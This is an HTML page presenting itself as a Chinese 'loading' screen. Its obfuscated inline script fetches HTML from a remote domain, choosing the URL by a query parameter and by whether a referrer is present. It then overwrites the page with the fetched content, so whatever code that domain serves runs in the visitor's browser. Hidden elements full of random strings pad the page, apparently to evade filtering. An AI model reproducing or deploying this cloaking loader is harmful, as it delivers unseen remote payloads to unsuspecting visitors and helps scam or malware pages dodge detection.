<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Hkd1dbm {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Hkd1dbm .xwXsPQxTegj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Hkd1dbm .content {
            line-height: 50px;
            text-align: center
        }

        .Hkd1dbm .img {
            width: 100%
        }

        .Hkd1dbm .d7edFKxa80N {
            text-align: center
        }

        .Hkd1dbm .d7edFKxa80N span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Hkd1dbm .d7edFKxa80N span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Hkd1dbm .d7edFKxa80N span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Hkd1dbm .d7edFKxa80N span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Hkd1dbm .d7edFKxa80N span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Hkd1dbm .d7edFKxa80N span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Hkd1dbm .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ytv2G2O8m(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RpYFn = ytv2G2O8m('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RpYFn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RpYFn +".html?a=share";
		}
		
        ZomhTh8=url+"#"+new Date().getTime();
        ZomhTh8 && function() {
            $.get(ZomhTh8, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>PNs3ztkzSJlNUtRfbqncJAQUle8ChidgYoAJ8rwMXt7EV06DMb77pCm5LuenOed2HNKW9Q5zi</a>
<span style='display:none'>g4bkTMjL3Cu4k4JG2NzZSykceFiSGxGVvxrYYG3ba59qqsSiqBPTtCaMU7NLTZrcDaauQffABlGEAeQBAjr97fyGIr7zTTf2x2f</span>
<ul style='display:none' >EF7i2sRwSjsXoL5TXYSxyLqcMtRFUtKYrblYcTkCVyhmaEyikwT0v8i3RWtAuECv</ul>
<div style='display:none'>qqgTWpBDrJHQWrcTZFHH6MbNzySvfXrUKWBfH</div><div class="Hkd1dbm">
    <div class="xwXsPQxTegj">
        <div class="d7edFKxa80N">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >HjOjsXqL1Whz5gE9xglLSNmQV8rhG68eHz</li>
<div style='display:none'>UaMHkfadVfzX4oJEJTk6AF0gId8roO5blbFEWbM4vq5xvkdH53ObOGPWHFQ1BPpmLCKkVsOp5tnzcoVwvPz3WVFqSBc8tp</div></body>
</html>